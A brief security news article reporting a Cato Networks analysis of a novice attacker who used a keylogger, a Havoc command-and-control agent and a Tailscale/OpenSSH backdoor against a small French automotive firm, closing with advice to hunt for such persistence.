Attackers Outlive Takedowns with SSH, Tailscale

A junior French-speaking hacker, operating after school hours, successfully breached a small French automotive business over 33 days, according to a detailed analysis by Cato Networks. The operator, using the handle “Poisson,” planted a keylogger and stole banking and email credentials using free infrastructure.

However, a critical move ensured his access outlived his primary attack server. He installed OpenSSH and Tailscale on a victim’s machine, creating an independent backdoor.

Consequently, when his Havoc command-and-control server went offline the next day, his access persisted for 18 days via the Tailscale network. The agents automatically reconnected when the C2 returned, allowing the operation to continue.

Researchers captured 339 commands after the operator leaked his SSH keys and a playbook. His tradecraft was described as thin, frequently failing and leaking his own data.

Meanwhile, the malware chain relied heavily on in-memory execution. A VBScript stager led to a PowerShell loader, which deployed the Havoc’s Demon agent without touching disk.

For persistence, he set a scheduled task and used a custom RustDesk instance. The keylogger was a simple Python script, with keystrokes harvested manually after using powercfg to keep systems awake.

Ultimately, the incident underscores that pulling a C2 offline is insufficient remediation. Cato Networks recommends specific hunts for OpenSSH installs, tailscale.exe, and reverse SSH tunnels on unauthorized workstations.

✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.

Previous Articles:

• Spacex IPO: To Buy Now Or Wait For Drop?
• “Bitcoin Rodney” Pleads Guilty in $1.8 Billion Crypto Fraud
• Coinbase bets on AI, expands beyond crypto trading
• Malware-Laced Steam Wallpapers Steal Crypto Wallets
• EU MiCA Deadline Looms as US CBDC Ban Advances